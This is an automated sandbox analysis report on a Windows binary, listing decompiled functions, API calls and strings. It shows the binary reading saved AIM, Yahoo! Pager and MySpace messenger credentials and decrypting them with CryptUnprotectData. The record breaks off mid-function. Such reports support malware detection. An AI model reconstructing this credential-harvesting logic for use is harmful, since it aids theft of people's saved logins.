                                • Opcode ID: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                • Instruction ID: 39cb4549293e6cd4e8f45f1fb6a35693fcb7bd1e2582dcc07fe9920ce8c868a3
                                • Opcode Fuzzy Hash: d76c6e9bbc824b9e791745045f41857ca1225a75c0f91e99517293dc547767ba
                                • Instruction Fuzzy Hash: 83014F32A0AA3527C6257E2675017CBA3646F05B29F15420FF808B73428B6C7DE046DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413B1D, Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00413B3E
                                • memset.MSVCRT ref: 00413B57
                                • memset.MSVCRT ref: 00413B6B
                                  • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                • strlen.MSVCRT ref: 00413B87
                                • memcpy.MSVCRT ref: 00413BAC
                                • memcpy.MSVCRT ref: 00413BC2
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                  • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                • memcpy.MSVCRT ref: 00413C02
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpymemset$strlen
                                • String ID:
                                • API String ID: 2142929671-0
                                • Opcode ID: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                • Instruction ID: 3b0ef80f5f4f1d26b85f6ed19fc7f93af9089081b0544b1b4270697ce1475561
                                • Opcode Fuzzy Hash: 12c23c21f074b2e82c1811d2f488e6951e7381ea67b5b6e5923544c93fd9d40f
                                • Instruction Fuzzy Hash: EB512CB290011DAFCB10EF55DC81AEEB7A9BF04309F5445BAE509E7141EB34AF898F94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00402730, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                • strtoul.MSVCRT ref: 00402782
                                • _mbscpy.MSVCRT ref: 00402807
                                • _mbscpy.MSVCRT ref: 00402817
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscpy$QueryValuestrtoul
                                • String ID: 3 d5JKNNC,MANSLDJQ32ELK1N4SAIp08$TRIPWD
                                • API String ID: 4008679483-1446091703
                                • Opcode ID: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
                                • Instruction ID: 4ca16360b260b82c0f814568f8b1846068da3ba20428fc10580ffdfcf904f702
                                • Opcode Fuzzy Hash: f6eeec1ff9ae7628eb1c59c3add0b7cd5bc7a45f9ca8feae453d05bdffcb2e4c
                                • Instruction Fuzzy Hash: 2C31E83280424C6EDF01DBB8E941ADFBFB4AF19310F1444AAE944FB191D674AB49CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B2F5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80COMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E0040B2F5(void* __eax) {
				void* __esi;
				_Unknown_base(*)()* _t30;
				void* _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr* _t41;
				char* _t51;
				int _t58;
				intOrPtr _t69;

				_t40 = __eax;
				memcpy( *((intOrPtr*)(__eax + 0x390)) + 0x1d4,  *(__eax + 0x38c), 0x1c8 << 2);
				asm("movsw");
				asm("movsb");
				_t44 =  *((intOrPtr*)(_t40 + 0x398));
				_t58 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)) > 0) {
					do {
						_t35 = E0040779F(_t58, _t44);
						0x413d74("/sort", _t35);
						if(_t35 == 0) {
							_t7 = _t58 + 1; // 0x1
							_t51 = E0040779F(_t7,  *((intOrPtr*)(_t40 + 0x398)));
							_t66 =  *_t51 - 0x7e;
							_t38 =  *((intOrPtr*)(_t40 + 0x390));
							if( *_t51 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t51 = _t51 + 1;
							}
							_push(_t51);
							E0040AE7D(_t38, _t66);
						}
						_t44 =  *((intOrPtr*)(_t40 + 0x398));
						_t58 = _t58 + 1;
					} while (_t58 <  *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)));
				}
				E0040671B();
				 *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)))) + 0x5c))();
				if(E004077AF( *((intOrPtr*)(_t40 + 0x398)), ?str?, 0xffffffff) == 0xffffffff) {
					_t69 =  *0x41e394; // 0x1
					_t41 =  *((intOrPtr*)(_t40 + 0x390));
					if(_t69 == 0) {
						 *0x41e398 =  *((intOrPtr*)(_t41 + 0x1ac));
						 *0x41e394 = 1;
					}
					_t30 =  *((intOrPtr*)( *_t41 + 0x60))(E0040AE57);
					qsort( *((intOrPtr*)( *_t41 + 0x64))(), 0,  *(_t41 + 0x28), _t30);
				}
				return SetCursor( *0x41dbd8);
			}












                                0x0040b2f8
                                0x0040b311
                                0x0040b313
                                0x0040b315
                                0x0040b316
                                0x0040b31e
                                0x0040b323
                                0x0040b325
                                0x0040b327
                                0x0040b332
                                0x0040b33b
                                0x0040b343
                                0x0040b34b
                                0x0040b34d
                                0x0040b350
                                0x0040b356
                                0x0040b35d
                                0x0040b358
                                0x0040b358
                                0x0040b35a
                                0x0040b35a
                                0x0040b35e
                                0x0040b35f
                                0x0040b35f
                                0x0040b364
                                0x0040b36a
                                0x0040b36b
                                0x0040b325
                                0x0040b370
                                0x0040b37b
                                0x0040b386
                                0x0040b39e
                                0x0040b3a0
                                0x0040b3a6
                                0x0040b3ac
                                0x0040b3b4
                                0x0040b3b9
                                0x0040b3b9
                                0x0040b3cf
                                0x0040b3dd
                                0x0040b3e2
                                0x0040b3f4

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Cursor_mbsicmpqsort
                                • String ID: /nosort$/sort
                                • API String ID: 882979914-1578091866
                                • Opcode ID: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                • Instruction ID: c642ed81bba6fc27793a5d708b6807a860a9cb0bcd27181b40ce8d315371ea34
                                • Opcode Fuzzy Hash: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
                                • Instruction Fuzzy Hash: 3721A231600200DFDB05EF25C8C1E9577A9EF85728F2400BAFD19AF2D2CB79A841CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413735, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55registryCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00413757
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                  • Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                • RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpenQueryValuememset
                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                • API String ID: 1830152886-1703613266
                                • Opcode ID: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
                                • Instruction ID: 02697a5e3e6c6c3f452774ad5988b122dd70f79e91add571e9a1c89a2d7602b2
                                • Opcode Fuzzy Hash: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
                                • Instruction Fuzzy Hash: 9301F9B6B00104FFEF106A95AD42ADA7BACDF04315F10406BFE04F3251E675AF8586AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412396, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                • SHGetMalloc.SHELL32(?), ref: 004123A6
                                • SHBrowseForFolder.SHELL32(?), ref: 004123D8
                                • SHGetPathFromIDList.SHELL32(00000000,?), ref: 004123EC
                                • _mbscpy.MSVCRT ref: 004123FF
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: BrowseFolderFromListMallocPath_mbscpy
                                • String ID: [@
                                • API String ID: 1479990042-3416412563
                                • Opcode ID: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                • Instruction ID: 5ef3e47e4b44953a2dad9ee1bf13406931f922e9c8d23326f6bb0268a582906b
                                • Opcode Fuzzy Hash: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
                                • Instruction Fuzzy Hash: 5F11FAB5900218EFCB00DFA9D984AEEBBF8EB49314B10406AE905E7200D779DE45CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408C31, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00408C31(CHAR* _a4, intOrPtr _a8) {
				void _v4103;
				char _v4104;

				0x414060();
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				GetPrivateProfileStringA(0x41e308, _a4, 0x417c88,  &_v4104, 0x1000, 0x41e200);
				if(_v4104 == 0) {
					return 0;
				} else {
					0x413d0c(_a8,  &_v4104);
					return 1;
				}
			}





                                0x00408c39
                                0x00408c4e
                                0x00408c55
                                0x00408c77
                                0x00408c85
                                0x00408ca0
                                0x00408c87
                                0x00408c91
                                0x00408c9c
                                0x00408c9c

                                APIs
                                • memset.MSVCRT ref: 00408C55
                                • GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
                                • _mbscpy.MSVCRT ref: 00408C91
                                Strings
                                • ?@, xrefs: 00408C31
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: PrivateProfileString_mbscpymemset
                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
                                • API String ID: 408644273-2377969721
                                • Opcode ID: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                • Instruction ID: 2fc49bb05c8bae64ff8dc8c223d61166255d3b04a08aec8dce2eb6f2e2500c43
                                • Opcode Fuzzy Hash: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
                                • Instruction Fuzzy Hash: BCF0E0725451587AEB139B54EC05FCA7BBC9B4C706F1040E6B749F6080D5F89AC087AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406830, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E00406830(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00406735(_t15,  &_v1028);
				_push( &_v1028);
				_push(_t15);
				sprintf( &_v2052, "Error %d: %s");
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}







                                0x0040683a
                                0x0040683e
                                0x00406846
                                0x00406846
                                0x0040684f
                                0x0040685a
                                0x0040685b
                                0x00406868
                                0x00406889

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLastMessagesprintf
                                • String ID: Error$Error %d: %s
                                • API String ID: 1670431679-1552265934
                                • Opcode ID: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                • Instruction ID: 390cea375f2136b4ea19b9d86a6fd2b83de258ebf73c3752b6ef921ad7f75954
                                • Opcode Fuzzy Hash: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
                                • Instruction Fuzzy Hash: 5CF0ECB780020877CB11A754CC05FD676BCBB84704F1540BAB905F2140FF74DA458FA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004108FA, Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • memset.MSVCRT ref: 00410939
                                • memset.MSVCRT ref: 0041097A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$AddressLibraryLoadProc
                                • String ID:
                                • API String ID: 95357979-0
                                • Opcode ID: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                • Instruction ID: c4421e9d11457ef95cabe1857e087483fdaed0180908bfd30e84e21e9d597d19
                                • Opcode Fuzzy Hash: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
                                • Instruction Fuzzy Hash: 6F5139B1C1021DAADF10DF95CD819EEB7BCBF18348F4001AAE605B2251E7789B84CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C929, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 67COMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E0040C929(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040CA46(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040CA46(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}













                                0x0040c92e
                                0x0040c930
                                0x0040c932
                                0x0040c935
                                0x0040c93b
                                0x0040c93e
                                0x0040c940
                                0x0040c940
                                0x0040c948
                                0x0040c94e
                                0x0040c951
                                0x0040c983
                                0x0040c986
                                0x0040c98a
                                0x0040c98d
                                0x0040c996
                                0x0040c99b
                                0x0040c9a3
                                0x0040c9a8
                                0x0040c9ac
                                0x0040c9af
                                0x0040c9af
                                0x0040c98d
                                0x0040c9b2
                                0x0040c9b3
                                0x0040c9b9
                                0x0040c953
                                0x0040c955
                                0x0040c956
                                0x0040c95a
                                0x0040c95e
                                0x0040c96c
                                0x0040c971
                                0x0040c979
                                0x0040c97e
                                0x0040c981
                                0x00000000
                                0x0040c960
                                0x0040c960
                                0x0040c961
                                0x0040c964
                                0x0040c964
                                0x0040c95e
                                0x0040c9c6

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy
                                • String ID: @$@
                                • API String ID: 3510742995-149943524
                                • Opcode ID: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                • Instruction ID: 666a53640e029d8b41511af47e133ff9607f2a84e66000161f6e85dafd6cdb1f
                                • Opcode Fuzzy Hash: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
                                • Instruction Fuzzy Hash: 7C115BF2A00709ABCB248F25ECC0DAA77A8EB50344B00033FFD0696291E634DE49C6D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410B95, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 62stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00410BB7
                                • memset.MSVCRT ref: 00410BCE
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                • strlen.MSVCRT ref: 00410BEA
                                • strlen.MSVCRT ref: 00410BF9
                                  • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                  • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetstrlen$FolderPathSpecial_mbscat_mbscpy
                                • String ID: MySpace\IM\users.txt
                                • API String ID: 1027419547-1720829597
                                • Opcode ID: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
                                • Instruction ID: 202a42f0f95dfe566303623c375a0ffeb092d6a880f5aac0c7a4f490a513d9c5
                                • Opcode Fuzzy Hash: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
                                • Instruction Fuzzy Hash: 3511CA7390411C6AD710EA51EC85EDB777C9F61305F1404FBE549E2042EEB89FC88BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A455, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                Download Yara Rule
                                C-Code - Quality: 49%
                                			E0040A455(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				char* _t30;
				signed int _t33;
				char* _t44;
				void* _t46;

				E004067EC(_a4, "<item>");
				_t33 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						 *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4),  *((intOrPtr*)(__edi + 0x4c)));
						0x41244b();
						_t44 =  &_v260;
						E00409DD6(_t44,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						_t30 = _t44;
						_push(_t30);
						_push( *((intOrPtr*)(__edi + 0x50)));
						_push(_t30);
						sprintf( *(__edi + 0x54), "<%s>%s</%s>");
						E004067EC(_a4,  *(__edi + 0x54));
						_t46 = _t46 + 0x28;
						_t33 = _t33 + 1;
					} while (_t33 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E004067EC(_a4, "</item>");
			}









                                0x0040a467
                                0x0040a46c
                                0x0040a473
                                0x0040a476
                                0x0040a484
                                0x0040a48b
                                0x0040a4a2
                                0x0040a4a7
                                0x0040a4b6
                                0x0040a4bc
                                0x0040a4c1
                                0x0040a4c3
                                0x0040a4c4
                                0x0040a4c7
                                0x0040a4d0
                                0x0040a4db
                                0x0040a4e0
                                0x0040a4e3
                                0x0040a4e4
                                0x0040a4e9
                                0x0040a4fb

                                APIs
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                • memset.MSVCRT ref: 0040A48B
                                  • Part of subcall function 0041244B: memcpy.MSVCRT ref: 004124B9
                                  • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                  • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                • sprintf.MSVCRT ref: 0040A4D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                • String ID: <%s>%s</%s>$</item>$<item>
                                • API String ID: 3337535707-2769808009
                                • Opcode ID: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                • Instruction ID: 35c3a08c9f4b1e8506f5bd30b0a1229d9af700aff423b6f7980a7f41b92f6d4d
                                • Opcode Fuzzy Hash: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
                                • Instruction Fuzzy Hash: E811E731500616BFD711AF15CC42E9ABB68FF0831CF10402AF409665A1EB76B974CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B1EC, Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E0040B1EC(void* __ebx) {
				void* __esi;
				void* _t18;
				void* _t37;

				_t37 = __ebx;
				_t18 = E00401033();
				if(_t18 == 0x37e9) {
					memcpy( *((intOrPtr*)(__ebx + 0x390)) + 0x1d4,  *(__ebx + 0x38c), 0x1c8 << 2);
					asm("movsw");
					asm("movsb");
					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0xb, 0, 0);
					E0040671B();
					 *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0x1009, 0, 0);
					if(E004028E7() == 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)))) + 0x5c))();
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x390)))) + 0x74))(1);
					E0040B15B(_t37);
					SetCursor( *0x41dbd8);
					SetFocus( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184), 0xb, 1, 0);
				}
				return _t18;
			}






                                0x0040b1ec
                                0x0040b1ec
                                0x0040b1f6
                                0x0040b216
                                0x0040b218
                                0x0040b21d
                                0x0040b233
                                0x0040b235
                                0x0040b242
                                0x0040b256
                                0x0040b25f
                                0x0040b269
                                0x0040b269
                                0x0040b276
                                0x0040b27b
                                0x0040b286
                                0x0040b298
                                0x00000000
                                0x0040b2b3
                                0x0040b2b4

                                APIs
                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B233
                                  • Part of subcall function 0040671B: LoadCursorA.USER32(00000000,00007F02), ref: 00406722
                                  • Part of subcall function 0040671B: SetCursor.USER32(00000000), ref: 00406729
                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B256
                                  • Part of subcall function 004028E7: GetModuleHandleA.KERNEL32(00000000), ref: 00402902
                                  • Part of subcall function 004028E7: GetProcAddress.KERNEL32(00000000,00000000), ref: 00402924
                                  • Part of subcall function 004028E7: FreeLibrary.KERNEL32(00000000), ref: 00402934
                                • SetCursor.USER32(?,?,0040C35B), ref: 0040B286
                                • SetFocus.USER32(?,?,?,0040C35B), ref: 0040B298
                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B2AF
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CursorMessageSend$AddressFocusFreeHandleLibraryLoadModuleProc
                                • String ID:
                                • API String ID: 1022157474-0
                                • Opcode ID: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                • Instruction ID: acf4f1a7ad8cb56491b263665e164ee1eacf8da490df75951db8ca09a257b5c1
                                • Opcode Fuzzy Hash: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
                                • Instruction Fuzzy Hash: 5C111235200204AFDB16AF55CC85FD537ADFF49708F0A40B9FD099F2A2CBB569108B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408A69, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00408A69(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00406DA8(_t30);
				}
				return 1;
			}









                                0x00408a74
                                0x00408a77
                                0x00408a81
                                0x00408a88
                                0x00408a93
                                0x00408aa3
                                0x00408ab1
                                0x00408ab9
                                0x00408abf
                                0x00408ac5
                                0x00408aca
                                0x00408acd
                                0x00408ad2
                                0x00408ad8

                                APIs
                                • GetParent.USER32(?), ref: 00408A7B
                                • GetWindowRect.USER32(?,?), ref: 00408A88
                                • GetClientRect.USER32(00000000,?), ref: 00408A93
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408AA3
                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408ABF
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Window$Rect$ClientParentPoints
                                • String ID:
                                • API String ID: 4247780290-0
                                • Opcode ID: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                • Instruction ID: 47fd7c03741454bdc7a166d99d5f54bcb442ad9a41c6e05a353417ffaf8a91e2
                                • Opcode Fuzzy Hash: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
                                • Instruction Fuzzy Hash: 0F014832901129BBDB11DBA5DC49EFFBFBCEF86750F04802AFD11A2140D77895018BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A627, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                Download Yara Rule
                                C-Code - Quality: 89%
                                			E0040A627(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E004067EC(_a4, "<?xml version="1.0"  encoding="ISO-8859-1" ?>");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
